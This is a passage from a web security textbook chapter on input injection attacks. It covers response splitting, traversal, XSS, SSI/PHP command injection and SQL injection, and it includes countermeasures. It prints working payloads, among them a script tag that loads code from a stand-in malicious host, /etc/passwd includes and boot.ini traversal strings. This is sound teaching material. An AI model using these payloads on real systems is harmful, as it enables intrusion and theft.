CHAPTER 6
INPUT INJECTION ATTACKS

Input validation serves as a first line of defense for a web application. Many vulnerabilities like SQL injection, HTML injection (and its subset of cross-site scripting), and verbose error messages are predicated on the ability of an attacker to inject some type of unexpected or malicious input to the application. When properly implemented, input validation routines ensure that the data is in a format, type, length, and range that is useful to the application. Without these checks, the confidentiality, integrity, and availability of an application and its information may be at risk.

Imagine a ZIP code field for an application’s shipping address form. Without a valid ZIP code, the postal service will not be able to deliver the mail quickly. We know that a ZIP code should consist of only digits. We also know that it should be at least 5 digits in length. Optionally, there can be 5 digits, a hyphen, and an additional 4 digits (ZIP plus 4), making a total of 10 characters So the first validation routine will be a length check. Does the input contain 5 or 10 characters? The second check will be for data type. Does the input contain any characters that are not numbers? If it is 5 characters in length, then it should be only digits. If it is 10 characters, there should be 9 numbers and a hyphen between the 5th and 6th characters. Validation of this ZIP format would involve ensuring no other characters besides digits exist—with the exception of a hyphen in position 6. To check the range of the input, we would verify that each digit was 0 to 9.

Since we’re working with a finite set of codes, we could add another check to query the list of known valid ZIP codes from zip4.usps.com or an offline copy of the list such as a text file or database. This check ensures the input is in the valid set of ZIP codes and acts as an even stronger form of input validation. For example, 12345 is a valid ZIP code belonging to General Electric in New York. They often get mail addressed to Santa Claus, North Pole 12345. However, 00000 is not a valid ZIP code; even though it passes the type, format, and length checks, it would take this additional check to determine its validity. This chapter focuses on the dangers inherent in placing trust in user-supplied data and the ways an application can be attacked if it does not properly restrict the type of data it expects.

Data validation can be complex, but it’s a major basis of application security. Application programmers must exercise a little prescience to figure out all of the possible values that a user might enter into a form field. We just discussed how to perform the type, length, format, and range checks for a ZIP code. These tests can be programmed in JavaScript, placed in the HTML page, and served over SSL. The JavaScript solution sounds simple enough at first glance, but it is also one of the biggest mistakes made by developers. As you will see in the upcoming sections, client-side input validation routines can be bypassed and SSL only preserves the confidentiality of a web transaction. In other words, you can’t trust the web browser to perform the security checks you expect, and encrypting the connection (via SSL) has no bearing on the content of the data submitted to the application.

EXPECT THE UNEXPECTED

One of the biggest failures of input validation is writing the routines in JavaScript and placing them in the browser. At first, it may seem desirable to use any client-side scripting language for validation routines because the processing does not have to be performed on the server. Client-side filters are simple to implement and are widely supported among web browsers (although individual browser quirks still lead to developer headaches). Most importantly, they move a lot of processing from the web server to the end user’s system. This is really a Pyrrhic victory for the application. The web browser is an untrusted, uncontrollable environment, because all data coming from and going to the web browser can be modified in transit irregardless of input validation routines. If performance is an issue, it is much cheaper to buy the hardware for another web server to handle the additional server-side input validation processing than to wait for a malicious user to compromise the application with a simple %0a in a parameter.

Attacks against input validation routines can target different aspects of the application. Understanding how an attacker might exploit an inadequate validation routine is important. The threats go well beyond mere “garbage data” errors.

Data storage This includes characters used in SQL injection attacks. These characters can be used to rewrite the database query so it performs a custom action for the attacker. An error might reveal information as simple as the programming language used in the application or as detailed as a raw SQL query sent from the application to its database.

Other users This includes cross-site scripting and other attacks related to “phishing.” The attacker might submit data that rewrites the HTML to steal information from an unsuspecting user or mislead that user into divulging sensitive information.

Web server’s host These attacks may be specific to the operating system, such as inserting a semicolon to run arbitrary commands on a Unix web server. An application may intend to execute a command on the web server, but be tricked into executing alternate commands through the use of special characters.

Application content An attacker may be able to generate errors that reveal information about the application’s programming language. Other attacks might bypass restrictions on the types of files retrieved by a browser. For example, many versions of the Nimda worm used an alternate encoding of a slash character (used to delimit directories) to bypass the IIS security check that was supposed to prevent users from requesting files outside of the web document root.

Buffer overflows in the server Overflow attacks have plagued programs for years and web applications are no different. This attack involves passing extremely large input into an application that ultimately extends beyond its allocated memory space and thus corrupts other areas in memory. The result may be an application crash, or when specially crafted input is supplied, it could end up executing arbitrarily supplied code. Buffer overflows are typically more of a concern for compiled languages like C and C++ rather than interpreted languages like Perl and Python. The nature of web platforms based on .NET and Java makes application-layer buffer overflows very difficult because they don’t allow the programmer to deal directly with stack and heap allocations (which are the playground of buffer overflows). A buffer overflow will more likely exist in the language platform.

Obtain arbitrary data access A user may be able to access data for a peer user, such as one customer being able to view another customer’s billing information. A user may also be able to access privileged data, such as an anonymous user being able to enumerate, create, or delete users. Data access also applies to restricted files or administration areas of the application.

WHERE TO FIND ATTACK VECTORS

Every GET and POST parameter is a potential target for input validation attacks. Altering argument values, whether they are populated from FORM data or generated by the application, is a trivial feat. The easiest points of attack are input fields in forms. Common fields are Login Name, Password, Address, Phone Number, Credit Card Number, and Search. Other fields that use drop-down menus should not be overlooked, either. The first step is to enumerate these fields and their approximate input type.

Don’t be misled that input validation attacks can only be performed against fields that the user must complete. Every variable in the GET or POST request can be attacked. The attack targets can be identified by performing an in-depth crawl of the application that simultaneously catalogs files, parameters, and form fields. This is often done using automated tools.

Cookie values are another target. Cookies contain values that might never be intended for manipulation by a user, but they can still be injected into to perform SQL injection or other injection attacks.

The cookie is simply a specific instance of an HTTP header. In fact, any HTTP header is a vector for input validation attacks. Another example of HTTP header-targeted attacks includes HTTP response splitting, in which a legitimate response is prematurely truncated in order to inject a forged set of headers (usually cookies or cache-control, which do the maximum damage client-side).

Let’s take a closer look at HTTP response splitting. This attack targets applications that use parameters to indicate redirects. For example, here is a potentially vulnerable URL:

   http://website/redirect.cgi?page=http://website/welcome.cgi

A good input validation routine would ensure that the value for the page parameter consists of a valid URL. Yet if arbitrary characters can be included, then the parameter might be rewritten with something like this:

   http://website/redirect.cgi?page =0d%0aContent-Type:%20text/
   html%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/
   html%0d%0a%0d%0a%3chtml%3eHello, world!%3c/html%3e

The original value of page has been replaced with a series of characters that mimics the HTTP response headers from a web server and includes a simple HTML string for “Hello, world!” The malicious payload is more easily understood by replacing the encoded characters:

   Content-Type: text/html
   HTTP/1.1 200 OK
   Content-Type: text/html
   <html>Hello, world!</html>

The end result is that the web browser displays this faked HTML content rather than the HTML content intended for the redirect. The example appears innocuous, but a malicious attack could include JavaScript or content that appears to be a request for the user’s password, Social Security number, credit card information, or other sensitive information. The point of this example is not how to create an effective phishing attack, but to demonstrate how a parameter’s content can be manipulated to produce unintended effects.

BYPASS CLIENT-SIDE VALIDATION ROUTINES

If your application’s input validation countermeasures can be summarized with one word, JavaScript, then the application is not as secure as you think. Client-side JavaScript can always be bypassed. Some personal proxy, personal firewall, and cookie-management software tout their ability to strip pop-up banners and other intrusive components of a web site. Many computer professionals (paranoiacs?) turn off JavaScript completely in order to avoid the latest e-mail virus. In short, there are many legitimate reasons and straightforward methods for Internet users to disable JavaScript.

Of course, disabling JavaScript tends to cripple most web applications. Luckily, we have several tools that help surgically remove JavaScript or enable us to submit content after the JavaScript check has been performed, which allows us to bypass client-side input validation. With a local proxy such as Burp, we can hold a GET or POST request before it is sent to the server. By doing so, we can enter data in the browser that passes the validation requirements, but then modify any value in the proxy while it’s held before forwarding it along to the server.

COMMON INPUT INJECTION ATTACKS

Let’s examine some common input validation attack payloads. Even though many of the attacks merely dump garbage characters into the application, other payloads contain specially crafted strings.

Buffer Overflow

Buffer overflows are less likely to appear in applications written in interpreted or high-level programming languages. For example, you would be hard-pressed to write a vulnerable application in PHP or Java. Yet an overflow may exist in one of the language’s built-in functions. In the end, it is probably better to spend time on other input validation issues, session management, and other web security topics. Of course, if your application consists of a custom ISAPI filter for IIS or a custom Apache module, then testing for buffer overflows or, perhaps more effectively, conducting a code security review is a good idea (see Chapter 10).

To execute a buffer overflow attack, you merely dump as much data as possible into an input field. This is the most brutish and inelegant of attacks, but useful when it returns an application error. Perl is well suited for conducting this type of attack. One instruction creates whatever length necessary to launch against a parameter:

   $ perl -e 'print "a" x 500'
   aaaaaaa...repeated 500 times

You can create a Perl script to make the HTTP requests (using the LWP module), or dump the output through netcat. Instead of submitting the normal argument, wrap the Perl line in back ticks and replace the argument. Here’s the normal request:

   $ echo -e "GET /login.php?user=faustus HTTP/1.0 " | 
   nc -vv website 80

Here’s the buffer test, calling on Perl from the command line:

   $ echo -e "GET /login.php?user=
   > `perl -e 'print "a" x 500'` HTTP/1.0 " | 
   nc -vv website 80

This sends a string of 500 "a" characters for the user value to the login.php file. This Perl trick can be used anywhere on the Unix (or Cygwin) command line. For example, combining this technique with the cURL program reduces the problem of dealing with SSL:

   $ curl https://website/login.php?user=`perl -e 'print "a" x 500'`

As you try buffer overflow tests with different payloads and different lengths, the target application may return different errors. These errors might all be “password incorrect,” but some of them might indicate boundary conditions for the user argument. The rule of thumb for buffer overflow testing is to follow basic differential analysis or anomaly detection:

1. Send a normal request to an application and record the server’s response.

2. Send the first buffer overflow test to the application, and record the server’s response.

3. Send the next buffer, and record the server’s response.

4. Repeat step 3 as necessary.

Whenever the server’s response differs from that of a “normal” request, examine what has changed. This helps you track down the specific payload that produces an error (such as 7,809 slashes on the URL are acceptable, but 7,810 are not).

In some cases, the buffer overflow attack enables the attacker to execute arbitrary commands on the server. This task is more difficult to produce once, but simple to replicate. In other words, experienced security auditing is required to find a vulnerability and to create an exploit, but an unsophisticated attacker can download and run a premade exploit.


NOTE

Most of the time these buffer overflow attacks are performed “blind.” Without access to the application to attach a debugger or to view log or system information, crafting a buffer overflow that results in system command execution is very difficult. The FrontPage Services Extension overflow on IIS, for example, could not have been crafted without full access to a system for testing.


Canonicalization (dot-dot-slash)

These attacks target pages that use template files or otherwise reference alternate files on the web server. The basic form of this attack is to move outside of the web document root in order to access system files, i.e., “../../../../../../../../../boot.ini”. The actual server, IIS and Apache, for example, is hopefully smart enough to stop this. IIS fell victim to such problems due to logical missteps in decoding URL characters and performing directory traversal security checks. Two well-known examples are the IIS Superfluous Decode (..%255c..) and IIS Unicode Directory Traversal (..%c0%af..) vulnerabilities. More information about these vulnerabilities is at the Microsoft web site at http://www.microsoft.com/technet/security/bulletin/MS01-026.mspx and http://www.microsoft.com/technet/security/bulletin/MS00-078.mspx.

A web application’s security is always reduced to the lowest common denominator. Even a robust web server falls due to an insecurely written application. The biggest victims of canonicalization attacks are applications that use templates or parse files from the server. If the application does not limit the types of files that it is supposed to view, then files outside of the web document root are fair game. This type of functionality is evident from the URL and is not limited to any one programming language or web server:

   /menu.asp?dimlDisplayer=menu.html
   /webacc?User.html=login.htt
   /SWEditServlet?station_path=Z&publication_id=2043&template=login.tem
   /Getfile.asp?/scripts/Client/login.js
   /includes/printable.asp?Link=customers/overview.htm

This technique succeeds against web servers when the web application does not verify the location and content of the file requested. For example, part of the URL for the login page of Novell’s web-based Groupwise application is /servlet/webacc?User.html=login.htt. This application is attacked by manipulating the User.html parameter:

   /servlet/webacc?User.html=../../../WebAccess/webacc.cfg%00

This directory traversal takes us out of the web document root and into configuration directories. Suddenly, the login page is a window to the target web server—and we don’t even have to log in!


TIP

Many embedded devices, media servers, and other Internet-connected devices have rudimentary web servers—take a look at many routers and wireless access points sold for home networks. When confronted by one of these servers, always try a simple directory traversal on the URL to see what happens. All too often security plays second fiddle to application size and performance!


Advanced Directory Traversal

Let’s take a closer look at the Groupwise example. A normal HTTP request returns the HTML content of login.htm:

   <HTML>
   <HEAD>
   <TITLE>GroupWise WebAccess Login</TITLE>
   </HEAD>
   <!login.htm>
   ..remainder of page truncated...

The first alarm that goes off is that the webacc servlet takes an HTML file (login.htt) as a parameter because it implies that the application loads and presents the file supplied to the User.html parameter. If the User.html parameter receives a value for a file that does not exist, then we would expect some type of error to occur. Hopefully, the error gives us some useful information. An example of the attack in a URL, http://website/servlet/webacc?user.html=nosuchfile, produces the following response:

   File does not exist:
   c:Novelljavaservletscom ovellwebaccess
   templates/nosuchfile/login.htt
   Cannot load file:
   c:Novelljavaservletscom ovellwebaccess
   templates/nosuchfile/login.htt.

The error discloses the application’s full installation path. Additionally, we discover that the login.htt file is appended by default to a directory specified in the user.html parameter. This makes sense because the application must need a default template if no user.html argument is passed. The login.htt file, however, gets in the way of a good and proper directory traversal attack. To get around this, we’ll try an old trick developed for use against Perl-based web applications: the null character. For example:

   http://website/servlet/webacc?user.html=../../../../../../../boot.ini%00
   [boot loader]
   timeout=30
   default=multi(0)disk(0)rdisk(0)partition(5)WINNT [operating systems]
   multi(0)disk(0)rdisk(0)partition(5)WINNT="Win2K" /fastdetect
   C:BOOTSECT.BSD="OpenBSD"
   C:BOOTSECT.LNX="Linux"
   C:CMDCONSBOOTSECT.DAT="Recovery Console" /cmdcons

Notice that even though the application appends login.htt to the value of the user.html parameter, we have succeeded in obtaining the content of a Windows boot.ini file. The trick is appending %00 to the user.html argument. The %00 is the URL-encoded representation of the null character, which carries a very specific meaning in a programming language like C when used with string variables. In the C language, a string is really just an arbitrarily long array of characters. In order for the program to know where a string ends, it reads characters until it reaches a special character to delimit the end: the null character. Therefore, the web server will pass the original argument to the user.html variable, including the %00. When the servlet engine interprets the argument, it still appends login.htt, turning the entire argument string into a value like this:

   ../../../../../../../boot.ini%00login.htt

A programming language like Perl actually accepts null characters within a string; it doesn’t use them as a delimiter. However, operating systems are written in C (and a mix of C++). When a language like Perl or Java must interact with a file on the operating system, it must interact with a function most likely written in C. Even though a string in Perl or Java may contain a null character, the operating system function will read each character in the string until it reaches the null delimiter, which means the login.htt is ignored. Web servers decode %xx sequences as hexadecimal values. Consequently, the %00 character is first translated by the web server to the null character, and then passed onto the application code (Perl in this case), which accepts the null as part of the parameter’s value.


TIP

Alternate character encoding with Unicode may also present challenges in the programming language. An IIS superfluous decode vulnerability was based on using alternate Unicode encoding to represent the slash character.


Forcing an application into accessing arbitrary files can sometimes take more tricks than just the %00. The following are some more techniques.

../../file.asp%00.jpg The application performs rudimentary name validation that requires an image suffix (.jpg or .gif).

../../file.asp%0a The newline character works just like the null. This might work when an input filter strips %00 characters, but not other malicious payloads.

/valid_dir/../../../file.asp The application performs rudimentary name validation on the file source. It must be within a valid directory. Of course, if it doesn’t remove directory traversal characters, then you can easily escape the directory.

valid_file.asp../../../../file.asp The application performs name validation on the file, but only performs a partial match on the filename.

%2e%2e%2f%2e%2e%2ffile.asp (../../file.asp) The application performs name validation before the argument is URL decoded, or the application’s name validation routine is weak and cannot handle URL-encoded characters.

Navigating Without Directory Listings

Canonicalization attacks allow directory traversal inside and outside of the web document root. Unfortunately, they rarely provide the ability to generate directory listings—and it’s rather difficult to explore the terrain without a map! However, there are some tricks that ease the difficulty of enumerating files. The first trick is to find out where the actual directory root begins. This is a drive letter on Windows systems and most often the root (“/”) directory on Unix systems. IIS makes this a little easier, since the top-most directory is “InetPub” by default. For example, find the root directory (drive letter) on an IIS host by continually adding directory traversals until you successfully obtain a target HTML file. Here’s an abbreviated example of tracking down the root for a target application’s default.asp file:

   Sent: /includes/printable.asp?Link=../inetpub/wwwroot/default.asp
   Return: Microsoft VBScript runtime error '800a0046'
   File not found
   /includes/printable.asp, line 10
   Sent: /includes/printable.asp?Link=../../inetpub/wwwroot/default.asp
   Return: Microsoft VBScript runtime error '800a0046'
   File not found
   /includes/printable.asp, line 10
   Sent: /includes/printable.asp?Link=../../../inetpub/wwwroot/
   default.asp
   Return: Microsoft VBScript runtime error '800a0046'
   File not found
   /includes/printable.asp, line 10
   Sent: /includes/printable.asp?Link=../../../../inetpub/wwwroot/
   default.asp
   Return: Microsoft VBScript runtime error '800a0046'
   ...source code of default.asp returned!...

It must seem pedantic to go through the trouble of finding the exact number of directory traversals when a simple ../../../../../../../../../../ would suffice. Yet, before you pass judgment, take a closer look at the number of escapes. There are four directory traversals necessary before the printable.asp file dumps the source code. If we assume that the full path is /inetpub/wwwroot/includes/printable.asp, then we should need to go up three directories. The extra traversal steps imply that the /includes directory is mapped somewhere else on the drive, or the default location for the Link files is somewhere else.


NOTE

The printable.asp file we found is vulnerable to this attack because the file does not perform input validation. This is evident from a single line of code from the file: Link = "D:Site serverdatapublishingdocuments"&Request.QueryString("Link"). Notice how many directories deep this is?


Error codes can also help us enumerate directories. We’ll use information such as “Path not found” and “Permission denied” to track down the directories that exist on a web server. Going back to the previous example, we’ll use the printable.asp to enumerate directories:

   Sent: /includes/printable.asp?Link=../../../../inetpub
   Return: Micosoft VBScript runtime error '800a0046'
   Permission denied
   /includes/printable.asp, line 10
   Sent: /includes/printable.asp?Link=../../../../inetpub/borkbork
   Return: Micosoft VBScript runtime error '800a0046'
   Path not found
   /includes/printable.asp, line 10
   Sent: /includes/printable.asp?Link=../../data
   Return: Micosoft VBScript runtime error '800a0046'
   Permission denied
   /includes/printable.asp, line 10
   Sent: /includes/printable.asp?Link=../../../../Program%20Files/
   Return: Micosoft VBScript runtime error '800a0046'
   Permission denied
   /includes/printable.asp, line 10

These results tell us that it is possible to distinguish between files or directories that exist on the web server and those that do not. We verified that the /inetpub and “Program Files” directories exist, but the error indicates that the web application doesn’t have read access to them. If the /inetpub/borkbork directory had returned the error “Permission denied,” then this technique would have failed because we would have no way of distinguishing between real directories (Program Files) and nonexistent ones (borkbork). We also discovered a data directory during this enumeration phase. This directory is within our mysterious path (D:Site serverdatapublishingdocuments) to the printables.asp file.

To summarize the steps for enumerating files:

1. Examine error codes. Determine if the application returns different errors for files that do not exist, directories that do not exist, files that exist (but perhaps have read access denied), and directories that exist.

2. Find the root. Add directory traversal characters until you can determine where the drive letter or root directory starts.

3. Move down the web document root. Files in the web document root are easy to enumerate. You should already have listed most of them when first surveying the application. These files are easier to find because they are a known quantity.

4. Find common directories. Look for temporary directories (/temp, /tmp, /var), program directories (/Program Files, /winnt, /bin, /usr/bin), and popular directories (/home, /etc, /downloads, /backup).

5. Try to access directory names. If the application has read access to the directory, it will list the directory contents. This makes file enumeration easy!


NOTE

A good web application tester’s notebook should contain recursive directory listings for common programs associated with web servers. Having a reference to the directories and configuration files greatly improves the success of directory traversal attacks. The application list should include programs such as Lotus Domino, Microsoft Site Server, and Apache Tomcat.


Canonicalization Countermeasures

The best defense against canonicalization attacks is to remove all dots (.) from GET and POST parameters. The parsing engine should also catch dots represented in Unicode and hexadecimal.

Force all reads to happen from a specific directory. Apply regular expression filters that remove all path information preceding the expected filename. For example, reduce /path1/path2/./path3/file to /file.

Secure filesystem permissions also mitigate this attack. First, run the web server as a least-privilege user: either as the “nobody” account on Unix systems or create a service account on Windows systems with the least privileges required to run the application. (See the “References & Further Reading” section for how to create a service account for ASP.NET applications.) Limit the web server account so it can only read files from directories specifically related to the web application.

Move sensitive files such as include files (*.inc) out of the web document root to a directory with proper access control. Ensure that anonymous Internet users cannot directly access directories containing sensitive files and that only users with proper authorization will be granted permission. This mitigates directory traversal attacks that are limited to viewing files within the document root. The server and privileged users are still able to access the files, but the user cannot read them.

HTML Injection

Script attacks include any method of submitting HTML-formatted strings to an application that subsequently renders those tags. The simplest script attacks involve entering <script> tags into a form field. If the user-submitted contents of that field are redisplayed, then the browser interprets the contents as a JavaScript directive rather than displaying the literal value <script>. The real targets of this attack are other users of the application who view the malicious content and fall prey to social engineering attacks.

There are two prerequisites for this attack. First, the application must accept user input. This sounds obvious; however, the input does not have to come from form fields. We will list some methods that can be tested on the URL, but headers and cookies are valid targets as well. Second, the application must redisplay the user input. The attack occurs when an application renders the data, which become HTML tags that the web browser interprets.

ImageCross-site Scripting (XSS)

Cross-site scripting attacks place malicious code, usually JavaScript, in locations where other users see it. Target fields in forms can be addresses, bulletin board comments, and so forth. The malicious code usually steals cookies, which would allow the attacker to impersonate the victim or perform a social engineering attack, tricking the victim into divulging his or her password. This type of social engineering attack has plagued Hotmail, Gmail, and AOL.

This is not intended to be a treatise on JavaScript or uber-techniques for manipulating browser vulnerabilities. Here are three methods that, if successful, indicate that an application is vulnerable:

   <script>document.write(document.cookie)</script>
   <script>alert('Salut!')</script>
   <script src="http://www.malicious-host.foo/badscript.js"></script>

Notice that the last line calls JavaScript from an entirely different server. This technique circumvents most length restrictions because the badscript.js file can be arbitrarily long, whereas the reference is relatively short. In addition to a layer of obfuscation, URL shortening services can sometimes be used to further reduce the size of the string. These tests are simple to execute against forms. Simply try the strings in any field that is redisplayed. For example, many e-commerce applications present a verification page after you enter your address. Enter <script> tags for your street name and see what happens.

There are other ways to execute XSS attacks. As we alluded to previously, an application’s search engine is a prime target for XSS attacks. Enter the payload in the search field, or submit it directly to the URL:

   http://www.website.com/search.pl?qu=<script>alert('foo')</alert>

We have found that error pages are often subject to XSS attacks. For example, the URL for a normal application error looks like this:

   http://www.website.com/errors.asp?Error=Invalid%20password

This displays a custom access denied page that says, “Invalid password.” Seeing a string on the URL reflected in the page contents is a great indicator of an XSS vulnerability. The attack would be created as:

   http://www.website.com/ errors.asp?Error=<script%20src=...

That is, place the script tags on the URL where it is ultimately returned to the browser and executed.

With the ability to execute arbitrary script code, performing a wide array of attacks against the end user is possible. Modern browser exploitation frameworks make it trivial for an attacker to use premade attack modules on a victim of XSS to log keystrokes, perform distributed port scanning, detect Tor, or execute other browser functionality. There even exists support to integrate Metasploit attacks against Internet Explorer or execute Firefox plug-in exploits. Further information on browser exploitation frameworks can be found in the “References & Further Reading” section at the end of the chapter.

ImageEmbedded Scripts

Embedded script attacks lack the popularity of cross-site scripting, but they are not necessarily rarer. An XSS attack targets other users of the application. An embedded script attack targets the application itself. In this case, the malicious code is not a pair of <script> tags, but formatting tags. This includes SSI directives, ASP brackets, PHP brackets, SQL query structures, or even HTML tags. The goal is to submit data that, when displayed by the application, executes as a program instruction or mangles the HTML output. Program execution can enable the attacker to access server variables such as passwords and files outside of the web document root. Needless to say, an embedded script poses a major risk to the application. If the embedded script merely mangles the HTML output, then the attacker may be presented with source code that did not execute properly. This can still expose sensitive application data.

Execution tests fall into several categories. An application audit does not require complex tests or malicious code. If an injected ASP date() function returns the current date, then the application’s input validation routine is inadequate. ASP code is very dangerous because it can execute arbitrary commands or access arbitrary files:

   <%= date() %>

Server-side includes also permit command execution and arbitrary file access:

   <!--#include virtual="global.asa" -->
   <!--#include file="/etc/passwd" -->
   <!--#exec cmd="/sbin/ifconfig –a" -->

Embedded Java and JSP are equally dangerous:

   <% java.util.Date today = new java.util.Date(); out.println(today); %>

Finally, we don’t want to forget PHP:

   <? print(Date("1 F d, Y")); ?>
   <? Include '/etc/passwd' ?>
   <? passthru("id");?>

If one of these strings actually works, then there is something seriously broken in the application. Language tags, such as <? or <%, are usually processed before user input. This doesn’t mean that an extra %> won’t break a JSP file, but don’t be too disappointed if it fails.

A more viable test is to break table and form structures. If an application creates custom tables based on user input, then a spurious </table> tag might end the page prematurely. This could leave half of the page displaying normal HTML output and the other half displaying raw source code. This technique is useful against dynamically generated forms.

ImageCookies and Predefined Headers

Web application testers always review cookie contents. Cookies, after all, can be manipulated to impersonate other users or to escalate privileges. The application must read the cookie; therefore, cookies are an equally valid test bed for script attacks. In fact, many applications interpret additional information that is particular to your browser. The HTTP 1.1 specification defines a User-Agent header that identifies the web browser. You usually see some form of “Mozilla” in this string.

Applications use the User-Agent string to accommodate browser quirks (since no one likes to follow standards). The text-based browser, lynx, even lets you specify a custom string:

   $ lynx -dump -useragent="<script>" 
   > http://website/page2a.html?tw=tests
   ...output truncated...
   Netscape running on a Mac might send one like this:
   User Agent: Mozilla/4.5 (Macintosh; U; PPC)
   And FYI, it appears that the browser you're currently using to view
   this document sends this User Agent string:

What’s this? The application can’t determine our custom User-Agent string. If we view the source, then we see why this happens:

   <BLOCKQUOTE>
   <PRE>
   <script>
   </PRE>
   </BLOCKQUOTE>

So, our <script> tag was accepted after all. This is a prime example of a vulnerable application. The point here is that input validation affects any input that the application receives.

ImageHTML Injection Countermeasures

The most significant defense against script attacks is to turn all angle brackets into their HTML-encoded equivalents. The left bracket, <, is represented by &lt; and the right bracket, >, is represented by &gt;. This ensures the brackets are always stored and displayed in an innocuous manner. A web browser will never execute a &lt;script&gt; tag.

Some applications intend to let users specify certain HTML tags such as bold, italics, and underline. In these cases, use regular expressions to validate the data. These checks should be inclusive, rather than exclusive. In other words, they should only look for acceptable tags, permit those tags, and HTML-encode all remaining brackets. For example, an inadequate regular expression that tries to catch <script> tags can be tricked:

   <scr%69pt>
   <<script>
   <a href="javascript:commands..."></a>
   <b+<script>
   <scrscriptipt> (bypasses regular expressions that replace "script" with null)

In this case, obviously it is easier to check for the presence of a positive (<cTypeface:Bold> is present) rather than the absence of a negative (<script> is not present).

More information about XSS and alternate ways in which payloads can be encoded is found at RSnake’s excellent XSS reference: http://ha.ckers.org/xss.html.

Boundary Checks

Numeric fields have much potential for misuse. Even if the application properly restricts the data to numeric values, some of those values may still cause an error. Boundary checking is the simple technique of trying the extremes of a value. Swapping out UserID=19237 for UserID=0 or UserID=-1 may generate informational errors or strange behavior. The upper bound should also be checked. A one-byte value cannot be greater than 255. A two-byte value cannot be greater than 65,535.

   1. http://www.victim.com/internal/CompanyList.asp?SortID=255
   Error: Your Search has timed out with too long of a list.
   2. http://www.victim.com/internal/CompanyList.asp?SortID=256 Search Results

   3. http://www.victim.com/internal/CompanyList.asp?SortID=0 Search Results

Notice that setting SortID to 255 does not return a successful query, but setting it to 256 in example 2 returns a query successfully. When SortID=0, in example 3, a successful query also occurs. It would seem that the application only expects an 8-bit value for SortID, which would make the acceptable range between 0 and 255—except that 255 is too long. Thus, we can safely assume that 256 is being interpreted as the value of 0 based on the fact that an unsigned 8-bit value “rolls over” after 255. Therefore, example requests 2 and 3 are equivalent in this case, which allows the user to determine the boundary of the value used in this portion of the application.

You (probably) won’t gain command execution or arbitrary file access from boundary checks. However, the errors they generate can reveal useful information about the application or the server. This check only requires a short list of values:

Boolean Any value that has some representation of true or false (T/F, true/ false, yes/no, 0/1). Try both values; then try a nonsense value. Use numbers for arguments that accept characters; use characters for arguments that accept digits.

Numeric Set zero and negative values (0 and –1 work best). Try the maximum values for various bit ranges, i.e., 256, 65536, 4294967296, in addition to values very close to those limits.

String Test length limitations. Determine if string variables, such as name and address, accept punctuation characters.

Manipulate Application Behavior

Some applications may have special directives that the developers used to perform tests. One of the most prominent is debug=1. Appending this to a GET or POST request could return more information about variables, the system, or backend database connectivity. A successful attack may require a combination of debug, dbg and true, T, or 1.

Some platforms may allow internal variables to be set on the URL. Other attacks target the web server. Inserting %3f.jsp will return directory listings against JRun 3.0 and 3.1 and Tomcat 3.2.3.

Search Engines

The mighty percent (%) often represents a wildcard match in SQL or search engines. Submitting the percent symbol in a search field might return the entire database content, or generate an informational error, as in the following example:

   http://victim.com/users/search?FreeText=on&kw=on&ss=%
   Exception in com.motive.web411.Search.processQuery(Compiled Code):
   java.lang.StringIndexOutOfBoundsException: String index out of range:
   3 at java.lang.String.substring(Compiled Code) at
   javax.servlet.http.HttpUtils.parseName(Compiled Code) at
   javax.servlet.http.HttpUtils.parseQueryString(Compiled Code) at
   com.motive.mrun.MotiveServletRequest.parseParameters(Compiled Code)
   at com.motive.mrun.MotiveServletRequest.getParameterValues(Compiled
   Code) at com.motive.web411.MotiveServlet.getParamValue(Compiled Code)
   at com.motive.web411.Search.processQuery(Compiled Code) at
   com.motive.web411.Search.doGet(Compiled Code) at
   javax.servlet.http.HttpServlet.service(Compiled Code) at
   javax.servlet.http.HttpServlet.service(Compiled Code) at
   com.motive.mrun.ServletRunner.RunServlet(Compiled Code)

SQL also uses the underscore (_) to represent a single-character wildcard match. Web applications that employ LDAP backends may also be exposed to similar attacks based on the asterisk (*), which represents a wildcard match in that protocol.

SQL Injection

One very popular attack that targets an application’s backend database is SQL injection. SQL injection is a style of code injection. Unlike XSS code injection that typically uses JavaScript to target the browser, SQL injection targets the SQL statement being executed by the application on the backend database. This attack involves injecting SQL into a dynamically constructed query that is then run on the backend database. Most commonly, the malicious input is concatenated directly into a SQL statement within the application code but SQL injection can also occur within stored procedures. By injecting SQL syntax, the logic of the statement can be modified so it performs a different action when executed. A quick test on a user input field that is used to query a database is to send a single quotation mark on the end of the value. In SQL syntax, the single quote delimits the start or end of a string value. Thus, when the single quote is injected into a vulnerable SQL statement, it has the potential to disrupt the pairing of string delimiters and generate an application error, which indicates a potential SQL injection vulnerability.

   http://www.website.com/users.asp?id=alex'

If the request generates an error, it is a good indication of a mishandled quotation mark and the application may be vulnerable to SQL injection attacks. Another popular attack against numeric fields is to inject OR 1=1, which changes how the WHERE conditional statement is interpreted. An example test would look like the following:

   http://www.website.com/userProfile.asp?id=1378 OR 1=1

Closely examining the application behavior differences when the id is equal to 1378 versus 1378 OR 1=1 may indicate a SQL injection vulnerability.

SQL injection vulnerabilities may be found in any application parameter that influences a database query. Attack points include the URL parameters, POST data, and cookie values. The simplest way to identify a SQL injection vulnerability is to add invalid or unexpected characters to a parameter value and watch for errors in the application’s response. This syntax-based approach is most effective when the application doesn’t suppress error messages from the database. When such error handling is implemented (or some simple input validation is present), then vulnerabilities can also be identified through semantic techniques that test the application’s behavior to valid SQL constructs.

Syntax tests involve injecting characters into a parameter with the intent of disrupting the syntax of the database query. The goal is to find a character that generates an error when the query is executed by the database, and is then propagated back through the application and returned in the server’s response. We’ll start with the most common injection character, the single quote ('). Remember the single quote is used to delineate string values in a SQL statement. Our first SQL injection test looks like this:

   http://website/aspnuke/module/support/task/detail.asp?taskid=1'

The server’s response, as seen in a browser, shows a database error and the invalid query that the application tried to submit to the database. Look for the WHERE tsk.TaskID=1' string near the end of the error message in Figure 6-1 to see where the injected character ended up.

Now let’s take a look at how and why this works: string concatenation. Many queries in a web application have a clause that is modified by some user input. In the previous example, the detail.asp file uses the value of the taskid parameter as part of the query.

Image

Figure 6-1 Verbose error message

Here is a portion of the source code. Look at the underlined section where the taskid parameter is used (some lines have been removed for readability):

   sStat = "SELECT tsk.TaskID, tsk.Title, tsk.Comments" &_
   ...
   "FROM tblTask tsk " &_
   ...
   "WHERE tsk.TaskID = " & steForm("taskid") & " " &_
   "AND tsk.Active <> 0 " &_
   "AND tsk.Archive = 0"
   Set rsArt = adoOpenRecordset(sStat)

